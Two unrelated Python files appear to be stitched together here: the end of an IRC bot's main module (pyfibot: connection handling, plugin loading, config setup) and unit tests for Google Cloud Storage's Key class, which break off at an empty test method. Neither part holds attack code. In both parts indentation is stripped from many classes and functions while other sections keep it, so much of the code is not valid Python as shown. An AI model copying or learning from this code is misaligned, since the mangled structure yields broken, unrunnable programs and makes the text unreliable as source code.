        self.nickname = nickname        # nick to use
        self.password = password
        self.realname = realname        # real-name field sent to the server
        self.channels = channels or {}  # channels to join
        # create network specific save directory under root
        savedir = os.path.join(root, alias)
        if not os.path.isdir(savedir):
            os.mkdir(savedir)

    def __repr__(self):
        return 'Network(%r, %r)' % (self.alias, self.address)
class InstantDisconnectProtocol(protocol.Protocol):
    """Protocol that drops the connection as soon as it is made.

    Returned by PyFiBotFactory.buildProtocol for addresses that do not
    match any configured network, so unknown connections are refused
    cleanly.
    """
    def connectionMade(self):
        self.transport.loseConnection()
class ThrottledClientFactory(protocol.ClientFactory):
    """Client factory that inserts a slight delay to connecting and reconnecting"""

    lostDelay = 10    # seconds to wait before reconnecting a lost connection
    failedDelay = 60  # seconds to wait before retrying a failed connection attempt

    def clientConnectionLost(self, connector, reason):
        # Established connection dropped: retry fairly quickly.
        log.info("connection lost (%s): reconnecting in %d seconds" % (reason, self.lostDelay))
        reactor.callLater(self.lostDelay, connector.connect)

    def clientConnectionFailed(self, connector, reason):
        # Connection never came up: back off longer before retrying.
        log.info("connection failed (%s): reconnecting in %d seconds" % (reason, self.failedDelay))
        reactor.callLater(self.failedDelay, connector.connect)
class PyFiBotFactory(ThrottledClientFactory):
"""python.fi bot factory"""
version = "20091115.0"
protocol = botcore.PyFiBot
allBots = None
moduledir = os.path.join(sys.path[0], "modules/")
startTime = None
config = None
def __init__(self, config):
"""Initialize the factory"""
self.config = config
self.data = {}
self.data['networks'] = {}
self.ns = {}
# cache url contents for 5 minutes, check for old entries every minute
self._urlcache = timeoutdict.TimeoutDict(timeout=300, pollinterval=60)
if not os.path.exists("data"):
os.mkdir("data")
def startFactory(self):
self.allBots = {}
self.starttime = time.time()
self._loadmodules()
ThrottledClientFactory.startFactory(self)
log.info("factory started")
def stopFactory(self):
del self.allBots
#self.data.close()
ThrottledClientFactory.stopFactory(self)
log.info("factory stopped")
reactor.stop()
def buildProtocol(self, address):
if re.match("[^a-z]+", address.host):
log.error("Kludge fix for twisted.words weirdness")
fqdn = socket.getfqdn(address.host)
address = (fqdn, address.port)
else:
address = (address.host, address.port)
# do we know how to connect to the given address?
for n in self.data['networks'].values():
# a server can have multiple DNS CNAME records (like irc.freenode.net)
aliases = socket.getaddrinfo(n.address[0], n.address[1], socket.AF_INET, socket.SOCK_STREAM)
# alias is a tupel: (family, socktype, proto, canonname, sockaddr)
aliases = [a[4][0] for a in aliases]
if socket.gethostbyname(address[0]) in aliases:
break
else:
log.info("unknown network address: " + repr(address))
return InstantDisconnectProtocol()
p = self.protocol(n)
self.allBots[n.alias] = p
p.factory = self
return p
def createNetwork(self, address, alias, nickname, password, realname, channels = None):
self.setNetwork(Network("data", alias, address, nickname, password, realname, channels))
def setNetwork(self, net):
nets = self.data['networks']
nets[net.alias] = net
self.data['networks'] = nets
def clientConnectionLost(self, connector, reason):
"""Connection lost for some reason"""
log.info("connection to %s lost" % str(connector.getDestination().host))
# find bot that connects to the address that just disconnected
for n in self.data['networks'].values():
dest = connector.getDestination()
if (dest.host, dest.port) == n.address:
if self.allBots.has_key(n.alias):
# did we quit intentionally?
if not self.allBots[n.alias].hasQuit:
# nope, reconnect
ThrottledClientFactory.clientConnectionLost(self, connector, reason)
del self.allBots[n.alias]
return
else:
log.info("No active connection to known network %s" % n.address[0])
def _finalize_modules(self):
"""Call all module finalizers"""
for module in self._findmodules():
# if rehashing (module already in namespace), finalize the old instance first
if self.ns.has_key(module):
if self.ns[module][0].has_key('finalize'):
log.info("finalize - %s" % module)
self.ns[module][0]['finalize']()
def _loadmodules(self):
"""Load all modules"""
self._finalize_modules()
for module in self._findmodules():
env = self._getGlobals()
log.info("load module - %s" % module)
# Load new version of the module
execfile(os.path.join(self.moduledir, module), env, env)
# initialize module
if env.has_key('init'):
log.info("initialize module - %s" % module)
env['init'](self.config)
# add to namespace so we can find it later
self.ns[module] = (env, env)
def _findmodules(self):
"""Find all modules"""
modules = [m for m in os.listdir(self.moduledir) if m.startswith("module_") and m.endswith(".py")]
return modules
def _getGlobals(self):
"""Global methods for modules"""
g = {}
g['getUrl'] = self.getUrl
g['getNick'] = self.getNick
g['isAdmin'] = self.isAdmin
g['isIgnored'] = self.isIgnored
return g
def getUrl(self, url, nocache=False):
    """Gets data, bs and headers for the given url, using the internal cache if necessary.

    @param url: URL to fetch
    @param nocache: when True, bypass and refresh the cache entry
    @return: the URLCacheItem for *url*
    """
    # serve from cache unless the caller explicitly bypasses it
    # dict.has_key() was removed in Python 3; 'in' works in both
    if url in self._urlcache and not nocache:
        log.info("cache hit : %s" % url)
    else:
        if nocache:
            log.info("cache pass: %s" % url)
        else:
            log.info("cache miss: %s" % url)
        self._urlcache[url] = URLCacheItem(url)
    return self._urlcache[url]
def getNick(self, user):
    """Parses nick from nick!user@host
    @type user: string
    @param user: nick!user@host
    @return: nick"""
    nick, _sep, _rest = user.partition('!')
    return nick
def isAdmin(self, user):
    """Check if an user has admin privileges.

    Matches the full user mask against every configured admin pattern.
    @return: True or False"""
    return any(fnmatch.fnmatch(user, pattern)
               for pattern in self.config['admins'])
def isIgnored(self, user):
    """Check if an user is ignored.

    The 'ignores' key is optional in the config; absent means nobody
    is ignored.
    @return: True or False"""
    # dict.has_key() was removed in Python 3; 'in' works in both
    if 'ignores' in self.config:
        for pattern in self.config['ignores']:
            if fnmatch.fnmatch(user, pattern):
                return True
    return False
def create_example_conf():
    """Create an example configuration file (bot.config.example).

    Does nothing if the example file already exists.
    @return: True if the file was written, False if it already existed
    """
    conf = """
nick: botnick
realname: https://github.com/nigeljonez/newpyfibot
bindip: 0.0.0.0
admins:
  - 'foo!bar@example.com'
ignores:
  - 'bar!foo@example.com'
networks:
  ircnet:
    server: irc.ircnet.com
    channels:
      - mychannel
  quakenet:
    server: irc.quakenet.org
    authname: name
    authpass: password
    channels:
      - (mysecret, password)
"""
    examplefile = 'bot.config.example'
    if os.path.exists(examplefile):
        return False
    # open() instead of the Python-2-only file() builtin; the context
    # manager guarantees the handle is closed even if yaml raises
    with open(examplefile, 'w') as f:
        yaml.dump(yaml.load(conf), f, default_flow_style=False)
    return True
def init_logging():
    """Configure the root logger: stream handler, DEBUG level, timestamped format."""
    filename = os.path.join(sys.path[0], 'pyfibot.log')
    # get root logger
    root = logging.getLogger()
    if False:  # disabled toggle: flip to True to log to a rotating file instead
        handler = logging.handlers.RotatingFileHandler(
            filename, maxBytes=5000 * 1024, backupCount=20)
    else:
        handler = logging.StreamHandler()
    # time format is same format of strftime
    fmt = logging.Formatter('%(asctime)-15s %(levelname)-8s %(name)-11s %(message)s')
    handler.setFormatter(fmt)
    root.addHandler(handler)
    root.setLevel(logging.DEBUG)
if __name__ == '__main__':
    # Entry point: load config, build the factory, connect every network.
    init_logging()
    sys.path.append(os.path.join(sys.path[0], 'lib'))
    config = os.path.join(sys.path[0], "bot.config")
    if os.path.exists(config):
        # NOTE(review): yaml.load on a local trusted file; yaml.safe_load is
        # preferred if the config could ever come from an untrusted source
        config = yaml.load(open(config))
    else:
        if create_example_conf():
            print("No config file found, I created an example config (bot.config.example) for you. Please edit it and rename to bot.config.")
        else:
            print('No config file found, there is an example config (bot.config.example) for you. Please edit it and rename to bot.config or delete it to generate a new example config.')
        sys.exit(1)
    # dict.has_key() was removed in Python 3; use membership tests instead
    if 'bindip' in config:
        bindip = config['bindip']
    else:
        bindip = "0.0.0.0"
    factory = PyFiBotFactory(config)
    for network, settings in config['networks'].items():
        # use network specific nick or realname if one has been configured
        if 'nick' in settings:
            nick = settings['nick']
        elif 'nick' in config:
            nick = config['nick']
        else:
            nick = "pyfibot"
        if 'password' in settings:
            password = settings['password']
        else:
            password = None
        if 'realname' in settings:
            realname = settings['realname']
        elif 'realname' in config:
            realname = config['realname']
        else:
            realname = "http://code.google.com/p/pyfibot/"
        # prevent internal confusion with channels
        chanlist = []
        for channel in settings['channels']:
            if channel[0] not in '&#!+^':
                channel = '#' + channel
            # The following is to get around an annoying yaml/freenode thing w/ ## channels
            chanlist.append(re.sub(r'\^', '#', channel))
        port = 6667
        try:
            # missing or non-numeric 'port' falls back to the IRC default
            port = int(settings.get('port'))
        except (TypeError, ValueError):
            pass
        factory.createNetwork((settings['server'], port), network, nick, password, realname, chanlist)
        reactor.connectTCP(settings['server'], port, factory, bindAddress=(bindip, 0))
    reactor.run()
|
|
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class Test_Key(unittest2.TestCase):
def _getTargetClass(self):
    """Return the class under test, imported lazily to avoid import-time failures."""
    from gcloud.storage.key import Key
    return Key
def _makeOne(self, *args, **kw):
    """Instantiate the class under test, forwarding all arguments."""
    return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
key = self._makeOne()
self.assertEqual(key.bucket, None)
self.assertEqual(key.connection, None)
self.assertEqual(key.name, None)
self.assertEqual(key._properties, {})
self.assertTrue(key._acl is None)
def test_ctor_explicit(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
properties = {'key': 'value'}
key = self._makeOne(bucket, KEY, properties)
self.assertTrue(key.bucket is bucket)
self.assertTrue(key.connection is connection)
self.assertEqual(key.name, KEY)
self.assertEqual(key.properties, properties)
self.assertTrue(key._acl is None)
def test_from_dict_defaults(self):
KEY = 'key'
properties = {'key': 'value', 'name': KEY}
klass = self._getTargetClass()
key = klass.from_dict(properties)
self.assertEqual(key.bucket, None)
self.assertEqual(key.connection, None)
self.assertEqual(key.name, KEY)
self.assertEqual(key.properties, properties)
self.assertTrue(key._acl is None)
def test_from_dict_explicit(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
properties = {'key': 'value', 'name': KEY}
klass = self._getTargetClass()
key = klass.from_dict(properties, bucket)
self.assertTrue(key.bucket is bucket)
self.assertTrue(key.connection is connection)
self.assertEqual(key.name, KEY)
self.assertEqual(key.properties, properties)
self.assertTrue(key._acl is None)
def test_acl_property(self):
from gcloud.storage.acl import ObjectACL
key = self._makeOne()
acl = key.acl
self.assertTrue(isinstance(acl, ObjectACL))
self.assertTrue(acl is key._acl)
def test_path_no_bucket(self):
key = self._makeOne()
self.assertRaises(ValueError, getattr, key, 'path')
def test_path_no_name(self):
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket)
self.assertRaises(ValueError, getattr, key, 'path')
def test_path_normal(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.path, '/b/name/o/%s' % KEY)
def test_path_w_slash_in_name(self):
KEY = 'parent/child'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.path, '/b/name/o/parent%2Fchild')
def test_public_url(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.public_url,
'http://commondatastorage.googleapis.com/name/%s' %
KEY)
def test_public_url_w_slash_in_name(self):
KEY = 'parent/child'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(
key.public_url,
'http://commondatastorage.googleapis.com/name/parent%2Fchild')
def test_generate_signed_url_w_default_method(self):
KEY = 'key'
EXPIRATION = '2014-10-16T20:34:37Z'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.generate_signed_url(EXPIRATION),
'http://example.com/abucket/akey?Signature=DEADBEEF'
'&Expiration=2014-10-16T20:34:37Z')
self.assertEqual(connection._signed,
[('/name/key', EXPIRATION, {'method': 'GET'})])
def test_generate_signed_url_w_slash_in_name(self):
KEY = 'parent/child'
EXPIRATION = '2014-10-16T20:34:37Z'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.generate_signed_url(EXPIRATION),
'http://example.com/abucket/akey?Signature=DEADBEEF'
'&Expiration=2014-10-16T20:34:37Z')
self.assertEqual(connection._signed,
[('/name/parent%2Fchild',
EXPIRATION, {'method': 'GET'})])
def test_generate_signed_url_w_explicit_method(self):
KEY = 'key'
EXPIRATION = '2014-10-16T20:34:37Z'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.generate_signed_url(EXPIRATION, method='POST'),
'http://example.com/abucket/akey?Signature=DEADBEEF'
'&Expiration=2014-10-16T20:34:37Z')
self.assertEqual(connection._signed,
[('/name/key', EXPIRATION, {'method': 'POST'})])
def test_exists_miss(self):
NONESUCH = 'nonesuch'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, NONESUCH)
self.assertFalse(key.exists())
def test_exists_hit(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
bucket._keys[KEY] = 1
self.assertTrue(key.exists())
def test_rename(self):
KEY = 'key'
NEW_NAME = 'new-name'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
bucket._keys[KEY] = 1
new_key = key.rename(NEW_NAME)
self.assertEqual(key.name, KEY)
self.assertEqual(new_key.name, NEW_NAME)
self.assertFalse(KEY in bucket._keys)
self.assertTrue(KEY in bucket._deleted)
self.assertTrue(NEW_NAME in bucket._keys)
def test_delete(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
bucket._keys[KEY] = 1
key.delete()
self.assertFalse(key.exists())
def test_download_to_file(self):
import httplib
from StringIO import StringIO
KEY = 'key'
chunk1_response = {'status': httplib.PARTIAL_CONTENT,
'content-range': 'bytes 0-2/6'}
chunk2_response = {'status': httplib.OK,
'content-range': 'bytes 3-5/6'}
connection = _Connection(
(chunk1_response, 'abc'),
(chunk2_response, 'def'),
)
bucket = _Bucket(connection)
MEDIA_LINK = 'http://example.com/media/'
properties = {'mediaLink': MEDIA_LINK}
key = self._makeOne(bucket, KEY, properties)
key.CHUNK_SIZE = 3
fh = StringIO()
key.download_to_file(fh)
self.assertEqual(fh.getvalue(), 'abcdef')
def test_download_to_filename(self):
import httplib
import os
import time
import datetime
from tempfile import NamedTemporaryFile
KEY = 'key'
chunk1_response = {'status': httplib.PARTIAL_CONTENT,
'content-range': 'bytes 0-2/6'}
chunk2_response = {'status': httplib.OK,
'content-range': 'bytes 3-5/6'}
connection = _Connection(
(chunk1_response, 'abc'),
(chunk2_response, 'def'),
)
bucket = _Bucket(connection)
MEDIA_LINK = 'http://example.com/media/'
properties = {'mediaLink': MEDIA_LINK,
'updated': '2014-12-06T13:13:50.690Z'}
key = self._makeOne(bucket, KEY, properties)
key.CHUNK_SIZE = 3
with NamedTemporaryFile() as f:
key.download_to_filename(f.name)
f.flush()
with open(f.name) as g:
wrote = g.read()
mtime = os.path.getmtime(f.name)
updatedTime = time.mktime(
datetime.datetime.strptime(
key.properties['updated'],
'%Y-%m-%dT%H:%M:%S.%fz').timetuple()
)
self.assertEqual(wrote, 'abcdef')
self.assertEqual(mtime, updatedTime)
def test_download_as_string(self):
import httplib
KEY = 'key'
chunk1_response = {'status': httplib.PARTIAL_CONTENT,
'content-range': 'bytes 0-2/6'}
chunk2_response = {'status': httplib.OK,
'content-range': 'bytes 3-5/6'}
connection = _Connection(
(chunk1_response, 'abc'),
(chunk2_response, 'def'),
)
bucket = _Bucket(connection)
MEDIA_LINK = 'http://example.com/media/'
properties = {'mediaLink': MEDIA_LINK}
key = self._makeOne(bucket, KEY, properties)
key.CHUNK_SIZE = 3
fetched = key.download_as_string()
self.assertEqual(fetched, 'abcdef')
def test_upload_from_file_simple(self):
import httplib
from tempfile import NamedTemporaryFile
from urlparse import parse_qsl
from urlparse import urlsplit
KEY = 'key'
DATA = 'ABCDEF'
response = {'status': httplib.OK}
connection = _Connection(
(response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
with NamedTemporaryFile() as fh:
fh.write(DATA)
fh.flush()
key.upload_from_file(fh, rewind=True)
rq = connection.http._requested
self.assertEqual(len(rq), 1)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'media', 'name': 'key'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['Content-Length'], '6')
self.assertEqual(headers['Content-Type'], 'application/unknown')
def test_upload_from_file_resumable(self):
    """A file above the resumable threshold uploads as POST + chunked PUTs."""
    import httplib
    from tempfile import NamedTemporaryFile
    from urlparse import parse_qsl
    from urlparse import urlsplit
    from gcloud._testing import _Monkey
    from _gcloud_vendor.apitools.base.py import http_wrapper
    from _gcloud_vendor.apitools.base.py import transfer
    KEY = 'key'
    UPLOAD_URL = 'http://example.com/upload/name/key'
    DATA = 'ABCDEF'
    loc_response = {'status': httplib.OK, 'location': UPLOAD_URL}
    chunk1_response = {'status': http_wrapper.RESUME_INCOMPLETE,
                       'range': 'bytes 0-4'}
    chunk2_response = {'status': httplib.OK}
    connection = _Connection(
        (loc_response, ''),
        (chunk1_response, ''),
        (chunk2_response, ''),
    )
    bucket = _Bucket(connection)
    key = self._makeOne(bucket, KEY)
    key.CHUNK_SIZE = 5
    # Set the threshold low enough that we force a resumable upload.
    with _Monkey(transfer, _RESUMABLE_UPLOAD_THRESHOLD=5):
        with NamedTemporaryFile() as fh:
            fh.write(DATA)
            fh.flush()
            key.upload_from_file(fh, rewind=True)
    rq = connection.http._requested
    self.assertEqual(len(rq), 3)
    # Initial POST that creates the resumable session.
    self.assertEqual(rq[0]['method'], 'POST')
    uri = rq[0]['uri']
    scheme, netloc, path, qs, _ = urlsplit(uri)
    self.assertEqual(scheme, 'http')
    self.assertEqual(netloc, 'example.com')
    self.assertEqual(path, '/b/name/o')
    self.assertEqual(dict(parse_qsl(qs)),
                     {'uploadType': 'resumable', 'name': 'key'})
    headers = dict(
        [(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
    self.assertEqual(headers['X-Upload-Content-Length'], '6')
    self.assertEqual(headers['X-Upload-Content-Type'],
                     'application/unknown')
    # First chunk PUT (bytes 0-4).
    self.assertEqual(rq[1]['method'], 'PUT')
    self.assertEqual(rq[1]['uri'], UPLOAD_URL)
    self.assertEqual(rq[1]['body'], DATA[:5])
    headers = dict(
        [(x.title(), str(y)) for x, y in rq[1]['headers'].items()])
    self.assertEqual(headers['Content-Range'], 'bytes 0-4/6')
    # Final chunk PUT (byte 5).
    self.assertEqual(rq[2]['method'], 'PUT')
    self.assertEqual(rq[2]['uri'], UPLOAD_URL)
    self.assertEqual(rq[2]['body'], DATA[5:])
    headers = dict(
        [(x.title(), str(y)) for x, y in rq[2]['headers'].items()])
    self.assertEqual(headers['Content-Range'], 'bytes 5-5/6')
def test_upload_from_file_w_slash_in_name(self):
import httplib
from tempfile import NamedTemporaryFile
from urlparse import parse_qsl
from urlparse import urlsplit
from _gcloud_vendor.apitools.base.py import http_wrapper
KEY = 'parent/child'
UPLOAD_URL = 'http://example.com/upload/name/parent%2Fchild'
DATA = 'ABCDEF'
loc_response = {'status': httplib.OK, 'location': UPLOAD_URL}
chunk1_response = {'status': http_wrapper.RESUME_INCOMPLETE,
'range': 'bytes 0-4'}
chunk2_response = {'status': httplib.OK}
connection = _Connection(
(loc_response, ''),
(chunk1_response, ''),
(chunk2_response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
with NamedTemporaryFile() as fh:
fh.write(DATA)
fh.flush()
key.upload_from_file(fh, rewind=True)
rq = connection.http._requested
self.assertEqual(len(rq), 1)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'media', 'name': 'parent/child'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['Content-Length'], '6')
self.assertEqual(headers['Content-Type'], 'application/unknown')
def test_upload_from_filename(self):
import httplib
from tempfile import NamedTemporaryFile
from urlparse import parse_qsl
from urlparse import urlsplit
from _gcloud_vendor.apitools.base.py import http_wrapper
KEY = 'key'
UPLOAD_URL = 'http://example.com/upload/name/key'
DATA = 'ABCDEF'
loc_response = {'status': httplib.OK, 'location': UPLOAD_URL}
chunk1_response = {'status': http_wrapper.RESUME_INCOMPLETE,
'range': 'bytes 0-4'}
chunk2_response = {'status': httplib.OK}
connection = _Connection(
(loc_response, ''),
(chunk1_response, ''),
(chunk2_response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
with NamedTemporaryFile(suffix='.jpeg') as fh:
fh.write(DATA)
fh.flush()
key.upload_from_filename(fh.name)
rq = connection.http._requested
self.assertEqual(len(rq), 1)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'media', 'name': 'key'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['Content-Length'], '6')
self.assertEqual(headers['Content-Type'], 'image/jpeg')
def test_upload_from_string(self):
import httplib
from urlparse import parse_qsl
from urlparse import urlsplit
from _gcloud_vendor.apitools.base.py import http_wrapper
KEY = 'key'
UPLOAD_URL = 'http://example.com/upload/name/key'
DATA = 'ABCDEF'
loc_response = {'status': httplib.OK, 'location': UPLOAD_URL}
chunk1_response = {'status': http_wrapper.RESUME_INCOMPLETE,
'range': 'bytes 0-4'}
chunk2_response = {'status': httplib.OK}
connection = _Connection(
(loc_response, ''),
(chunk1_response, ''),
(chunk2_response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
key.upload_from_string(DATA)
rq = connection.http._requested
self.assertEqual(len(rq), 1)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'media', 'name': 'key'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['Content-Length'], '6')
self.assertEqual(headers['Content-Type'], 'text/plain')
def test_make_public(self):
from gcloud.storage.acl import _ACLEntity
KEY = 'key'
permissive = [{'entity': 'allUsers', 'role': _ACLEntity.READER_ROLE}]
after = {'acl': permissive}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.acl.loaded = True
key.make_public()
self.assertEqual(list(key.acl), permissive)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'], {'acl': permissive})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_cache_control_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CACHE_CONTROL = 'no-cache'
properties = {'cacheControl': CACHE_CONTROL}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.cache_control, CACHE_CONTROL)
def test_cache_control_setter(self):
KEY = 'key'
CACHE_CONTROL = 'no-cache'
after = {'cacheControl': CACHE_CONTROL}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.cache_control = CACHE_CONTROL
self.assertEqual(key.cache_control, CACHE_CONTROL)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'], {'cacheControl': CACHE_CONTROL})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_component_count(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
COMPONENT_COUNT = 42
properties = {'componentCount': COMPONENT_COUNT}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.component_count, COMPONENT_COUNT)
def test_content_disposition_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CONTENT_DISPOSITION = 'Attachment; filename=example.jpg'
properties = {'contentDisposition': CONTENT_DISPOSITION}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.content_disposition, CONTENT_DISPOSITION)
def test_content_disposition_setter(self):
KEY = 'key'
CONTENT_DISPOSITION = 'Attachment; filename=example.jpg'
after = {'contentDisposition': CONTENT_DISPOSITION}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.content_disposition = CONTENT_DISPOSITION
self.assertEqual(key.content_disposition, CONTENT_DISPOSITION)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'contentDisposition': CONTENT_DISPOSITION})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_content_encoding_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CONTENT_ENCODING = 'gzip'
properties = {'contentEncoding': CONTENT_ENCODING}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.content_encoding, CONTENT_ENCODING)
def test_content_encoding_setter(self):
KEY = 'key'
CONTENT_ENCODING = 'gzip'
after = {'contentEncoding': CONTENT_ENCODING}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.content_encoding = CONTENT_ENCODING
self.assertEqual(key.content_encoding, CONTENT_ENCODING)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'contentEncoding': CONTENT_ENCODING})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_content_language_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CONTENT_LANGUAGE = 'pt-BR'
properties = {'contentLanguage': CONTENT_LANGUAGE}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.content_language, CONTENT_LANGUAGE)
def test_content_language_setter(self):
KEY = 'key'
CONTENT_LANGUAGE = 'pt-BR'
after = {'contentLanguage': CONTENT_LANGUAGE}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.content_language = CONTENT_LANGUAGE
self.assertEqual(key.content_language, CONTENT_LANGUAGE)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'contentLanguage': CONTENT_LANGUAGE})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_content_type_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CONTENT_TYPE = 'image/jpeg'
properties = {'contentType': CONTENT_TYPE}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.content_type, CONTENT_TYPE)
def test_content_type_setter(self):
KEY = 'key'
CONTENT_TYPE = 'image/jpeg'
after = {'contentType': CONTENT_TYPE}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.content_type = CONTENT_TYPE
self.assertEqual(key.content_type, CONTENT_TYPE)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'contentType': CONTENT_TYPE})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_crc32c_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CRC32C = 'DEADBEEF'
properties = {'crc32c': CRC32C}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.crc32c, CRC32C)
def test_crc32c_setter(self):
KEY = 'key'
CRC32C = 'DEADBEEF'
after = {'crc32c': CRC32C}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.crc32c = CRC32C
self.assertEqual(key.crc32c, CRC32C)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'crc32c': CRC32C})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_etag(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
ETAG = 'ETAG'
properties = {'etag': ETAG}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.etag, ETAG)
def test_generation(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
GENERATION = 42
properties = {'generation': GENERATION}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.generation, GENERATION)
def test_id(self):
